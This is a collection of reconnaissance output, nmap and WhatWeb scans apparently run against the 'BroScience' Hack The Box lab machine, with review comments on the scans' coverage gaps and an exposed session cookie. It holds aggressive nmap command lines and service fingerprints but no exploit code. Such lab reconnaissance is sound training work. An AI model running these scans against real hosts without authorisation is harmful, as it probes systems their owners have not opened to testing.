# Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.032s latency).
Scanned at 2023-02-01 17:50:14 CET for 41s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-malware-host: Host appears to be clean
|_http-server-header: Apache/2.4.54 (Debian)
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-feed: Couldn't find any feeds.
|_http-title: Did not follow redirect to https://broscience.htb/
| http-useragent-tester:
| Status for browser useragent: 200
| Redirected To: https://broscience.htb/
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-mobileversion-checker: No mobile version detected.
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-vhosts:
|_128 names had status 301
|_http-comments-displayer: Couldn't find any comments.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-sitemap-generator:
| Directory structure:
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_
| http-security-headers:
| Cache_Control:
| Header: Cache-Control: no-store, no-cache, must-revalidate
| Pragma:
| Header: Pragma: no-cache
| Expires:
|_ Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT
|_http-chrono: Request times for /; avg: 307.69ms; min: 157.39ms; max: 507.13ms
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-headers:
| Date: Wed, 01 Feb 2023 16:50:40 GMT
| Server: Apache/2.4.54 (Debian)
| Location: https://broscience.htb/
| Content-Length: 311
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
|
|_ (Request type: GET)
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-errors: Couldn't find any error pages.
|_http-date: Wed, 01 Feb 2023 16:50:32 GMT; 0s from local time.
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:55 2023 -- 1 IP address (1 host up) scanned in 41.47 seconds
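Review bot: The negative results in this port-80 scan should not be read as findings about the application, because the scripts that report what they fetched only saw the 301 to https://broscience.htb/ (`http-title: Did not follow redirect`, `http-sitemap-generator` at depth 0). Lines such as `http-csrf: Couldn't find any CSRF vulnerabilities` and `http-stored-xss` therefore most likely describe the redirect page only. Three scripts (`http-passwd`, `http-vuln-cve2013-7091`, `http-config-backup`) report `ERROR: Script execution failed`, which is no result rather than a clean one. A note kept next to the file would record this, for example `port 80 only redirects to 443; NSE negatives here are not coverage of the site, three scripts errored`. The XML copy of the same scan later in the commit carries the same caveat.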


@@ -0,0 +1,97 @@
WhatWeb report for http://10.10.11.195:80
Status : 301 Moved Permanently
Title : 301 Moved Permanently
IP : 10.10.11.195
Country : RESERVED, ZZ
Summary : Apache[2.4.54], HTTPServer[Debian Linux][Apache/2.4.54 (Debian)], RedirectLocation[https://broscience.htb/]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.54 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.54 (Debian) (from server string)
[ RedirectLocation ]
HTTP Server string location. used with http-status 301 and
302
String : https://broscience.htb/ (from location)
HTTP Headers:
HTTP/1.1 301 Moved Permanently
Date: Wed, 01 Feb 2023 16:50:21 GMT
Server: Apache/2.4.54 (Debian)
Location: https://broscience.htb/
Content-Length: 309
Connection: close
Content-Type: text/html; charset=iso-8859-1
WhatWeb report for https://broscience.htb/
Status : 200 OK
Title : BroScience : Home
IP : 10.10.11.195
Country : RESERVED, ZZ
Summary : Apache[2.4.54], Cookies[PHPSESSID], HTTPServer[Debian Linux][Apache/2.4.54 (Debian)], Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.54 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.54 (Debian) (from server string)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Wed, 01 Feb 2023 16:50:39 GMT
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=mqqap7okl1bs60oanfo17fb97c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1418
Connection: close
Content-Type: text/html; charset=UTF-8
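Review bot: The `Set-Cookie: PHPSESSID=...` line in the HTTPS report commits a session identifier verbatim; even for a lab target, scan artefacts are better stored with it masked, as in `Set-Cookie: PHPSESSID=<redacted>; path=/`. The captured header also shows the cookie issued with only `path=/`, with no `Secure`, `HttpOnly` or `SameSite` attribute visible. That is worth writing down as an explicit finding in the notes rather than leaving it implicit in raw tool output.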


@@ -0,0 +1,84 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:50:14 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.10.11.195" start="1675270214" startstr="Wed Feb 1 17:50:14 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="NSE" time="1675270214"/>
<taskend task="NSE" time="1675270214"/>
<taskbegin task="SYN Stealth Scan" time="1675270214"/>
<taskend task="SYN Stealth Scan" time="1675270214" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1675270214"/>
<taskend task="Service scan" time="1675270221" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1675270221"/>
<taskprogress task="NSE" time="1675270252" percent="99.67" remaining="1" etc="1675270252"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<host starttime="1675270214" endtime="1675270255"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" hostname="broscience.htb" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-passwd" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-vuln-cve2013-7091" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-malware-host" output="Host appears to be clean"/><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
</script><script id="http-referer-checker" output="Couldn&apos;t find any cross-domain scripts."/><script id="http-feed" output="Couldn&apos;t find any feeds."/><script id="http-title" output="Did not follow redirect to https://broscience.htb/"><elem key="redirect_url">https://broscience.htb/</elem>
</script><script id="http-useragent-tester" output="&#xa; Status for browser useragent: 200&#xa; Redirected To: https://broscience.htb/&#xa; Allowed User Agents: &#xa; Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa; libwww&#xa; lwp-trivial&#xa; libcurl-agent/1.0&#xa; PHP/&#xa; Python-urllib/2.5&#xa; GT::WWW&#xa; Snoopy&#xa; MFC_Tear_Sample&#xa; HTTP::Lite&#xa; PHPCrawl&#xa; URI::Fetch&#xa; Zend_Http_Client&#xa; http client&#xa; PECL::HTTP&#xa; Wget/1.13.4 (linux-gnu)&#xa; WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
<elem key="Redirected To">https://broscience.htb/</elem>
<table key="Allowed User Agents">
<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
<elem>libwww</elem>
<elem>lwp-trivial</elem>
<elem>libcurl-agent/1.0</elem>
<elem>PHP/</elem>
<elem>Python-urllib/2.5</elem>
<elem>GT::WWW</elem>
<elem>Snoopy</elem>
<elem>MFC_Tear_Sample</elem>
<elem>HTTP::Lite</elem>
<elem>PHPCrawl</elem>
<elem>URI::Fetch</elem>
<elem>Zend_Http_Client</elem>
<elem>http client</elem>
<elem>PECL::HTTP</elem>
<elem>Wget/1.13.4 (linux-gnu)</elem>
<elem>WWW-Mechanize/1.34</elem>
</table>
</script><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-vhosts" output="&#xa;128 names had status 301"/><script id="http-comments-displayer" output="Couldn&apos;t find any comments."/><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-sitemap-generator" output="&#xa; Directory structure:&#xa; Longest directory structure:&#xa; Depth: 0&#xa; Dir: /&#xa; Total files found (by extension):&#xa; &#xa;"/><script id="http-security-headers" output="&#xa; Cache_Control: &#xa; Header: Cache-Control: no-store, no-cache, must-revalidate&#xa; Pragma: &#xa; Header: Pragma: no-cache&#xa; Expires: &#xa; Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT"><table key="Cache_Control">
<elem>Header: Cache-Control: no-store, no-cache, must-revalidate</elem>
</table>
<table key="Pragma">
<elem>Header: Pragma: no-cache</elem>
</table>
<table key="Expires">
<elem>Header: Expires: Thu, 19 Nov 1981 08:52:00 GMT</elem>
</table>
</script><script id="http-chrono" output="Request times for /; avg: 307.69ms; min: 157.39ms; max: 507.13ms"/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-headers" output="&#xa; Date: Wed, 01 Feb 2023 16:50:40 GMT&#xa; Server: Apache/2.4.54 (Debian)&#xa; Location: https://broscience.htb/&#xa; Content-Length: 311&#xa; Connection: close&#xa; Content-Type: text/html; charset=iso-8859-1&#xa; &#xa; (Request type: GET)&#xa;"/><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-date" output="Wed, 01 Feb 2023 16:50:32 GMT; 0s from local time."><elem key="date">2023-02-01T16:50:32+00:00</elem>
<elem key="delta">0.0</elem>
</script><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/></port>
</ports>
<times srtt="31501" rttvar="31501" to="157505"/>
</host>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<taskbegin task="NSE" time="1675270255"/>
<taskend task="NSE" time="1675270255"/>
<runstats><finished time="1675270255" timestr="Wed Feb 1 17:50:55 2023" summary="Nmap done at Wed Feb 1 17:50:55 2023; 1 IP address (1 host up) scanned in 41.47 seconds" elapsed="41.47" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1,174 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml 10.10.11.195 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml 10.10.11.195" start="1675270179" startstr="Wed Feb 1 17:49:39 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="NSE" time="1675270179"/>
<taskend task="NSE" time="1675270179"/>
<taskbegin task="SYN Stealth Scan" time="1675270179"/>
<taskend task="SYN Stealth Scan" time="1675270188" extrainfo="65535 total ports"/>
<taskbegin task="Service scan" time="1675270188"/>
<taskend task="Service scan" time="1675270201" extrainfo="3 services on 1 host"/>
<taskbegin task="Traceroute" time="1675270204"/>
<taskend task="Traceroute" time="1675270205"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1675270205"/>
<taskend task="Parallel DNS resolution of 1 host." time="1675270216"/>
<taskbegin task="NSE" time="1675270216"/>
<taskend task="NSE" time="1675270239"/>
<taskbegin task="NSE" time="1675270239"/>
<taskend task="NSE" time="1675270241"/>
<taskbegin task="NSE" time="1675270241"/>
<taskend task="NSE" time="1675270241"/>
<host starttime="1675270179" endtime="1675270241"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.11.195" addrtype="ipv4"/>
<hostnames>
<hostname name="broscience.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="65532">
<extrareasons reason="reset" count="65532" proto="tcp" ports="1-21,23-79,81-442,444-65535"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.4p1 Debian 5+deb11u1" extrainfo="protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.4p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=&#xa; 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=&#xa; 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN"><table>
<elem key="fingerprint">df17c6bab18222d91db5ebff5d3d2cb7</elem>
<elem key="type">ssh-rsa</elem>
<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQDB5dEat1MGh3CDDnkl4tdWQcTpdWZYHZj5/Orv3PDjSiQ4dg1i35kknwiZrXLiMsUu/4TigP9Kc3h4M1CS7E3/GprpWxuGmipEucoQuNEtaM0sUa8xobtFxOVF46kS0++ozTd4+zbSLsu73SlLcSuSFalhGnHteHj6/ksSeX642103SMqkkmEu/cbgofkoqQOCYk3Qa42bZq5bjS/auGAlPoAxTjjVtpHnXOKOU7M6gkewD91FB3GAMUdwqR/PJcA5xqGFZm2St9ecSbewCur6pLN5YKnNhvdID4ijWI22gu5pLxHL9XjORMbSUkJbB79VoYJZaNkdOgt+HXR67s9DWI47D6/+pO0dTfQgMFgOCxYheWMDQ2FuyHyGX1CZpMVLAo3sjOvxAqk7eUGutsyBAlYCD4lhSFs6RhSBynahHQah7+Lv5LKRriZe/fQIgrJrQj+tR4Uhz89eWGrXK9bjN22wy7tVkMG/w5dOwo7S3Wi0aTZfd/17D0z7wSdiAiE=</elem>
<elem key="bits">3072</elem>
</table>
<table>
<elem key="fingerprint">3f8a56f8958faeafe3ae7eb880f679d2</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=</elem>
<elem key="bits">256</elem>
</table>
<table>
<elem key="fingerprint">3c6575274ae2ef9391374cfdd9d46341</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN</elem>
<elem key="bits">256</elem>
</table>
</script></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" hostname="broscience.htb" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-title" output="Did not follow redirect to https://broscience.htb/"><elem key="redirect_url">https://broscience.htb/</elem>
</script><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-server-header" output="Apache/2.4.54 (Debian)"><elem>Apache/2.4.54 (Debian)</elem>
</script></port>
<port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.54" extrainfo="(Debian)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.54</cpe></service><script id="http-methods" output="&#xa; Supported Methods: GET HEAD POST OPTIONS"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
<elem>POST</elem>
<elem>OPTIONS</elem>
</table>
</script><script id="http-title" output="400 Bad Request"><elem key="title">400 Bad Request</elem>
</script><script id="ssl-cert" output="Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna&#xa;Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna&#xa;Public Key type: rsa&#xa;Public Key bits: 4096&#xa;Signature Algorithm: sha256WithRSAEncryption&#xa;Not valid before: 2022-07-14T19:48:36&#xa;Not valid after: 2023-07-14T19:48:36&#xa;MD5: 5328ddd62f3429d11d26ae8a68d86e0c&#xa;SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b&#xa;-&#45;&#45;&#45;&#45;BEGIN CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL&#xa;BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv&#xa;U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW&#xa;HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN&#xa;MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw&#xa;EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG&#xa;CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ&#xa;KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK&#xa;B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N&#xa;j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d&#xa;mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6&#xa;Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa&#xa;gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1&#xa;m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY&#xa;BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL&#xa;7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ&#xa;Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG&#xa;BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5&#xa;PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A&#xa;WjAfBgNVHSMEGDAWgBR8vM
UiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD&#xa;AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC&#xa;H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK&#xa;atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb&#xa;TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj&#xa;+Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O&#xa;r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6&#xa;QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO&#xa;P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm&#xa;w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx&#xa;Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK&#xa;bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc&#xa;dfC1SCd82A==&#xa;-&#45;&#45;&#45;&#45;END CERTIFICATE-&#45;&#45;&#45;&#45;&#xa;"><table key="subject">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="issuer">
<elem key="commonName">broscience.htb</elem>
<elem key="countryName">AT</elem>
<elem key="emailAddress">administrator@broscience.htb</elem>
<elem key="localityName">Vienna</elem>
<elem key="organizationName">BroScience</elem>
</table>
<table key="pubkey">
<elem key="type">rsa</elem>
<elem key="bits">4096</elem>
<elem key="modulus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elem>
<elem key="exponent">65537</elem>
</table>
<table key="extensions">
<table>
<elem key="name">X509v3 Subject Key Identifier</elem>
<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Authority Key Identifier</elem>
<elem key="value">7C:BC:C5:22:C8:6E:50:5B:21:11:E5:C3:A1:93:6E:2B:68:BF:80:5A</elem>
</table>
<table>
<elem key="name">X509v3 Basic Constraints</elem>
<elem key="value">CA:TRUE</elem>
<elem key="critical">true</elem>
</table>
</table>
<elem key="sig_algo">sha256WithRSAEncryption</elem>
<table key="validity">
<elem key="notBefore">2022-07-14T19:48:36</elem>
<elem key="notAfter">2023-07-14T19:48:36</elem>
</table>
<elem key="md5">5328ddd62f3429d11d26ae8a68d86e0c</elem>
<elem key="sha1">20568d0d9e4109cde5a22021fe3f349c40d8d75b</elem>
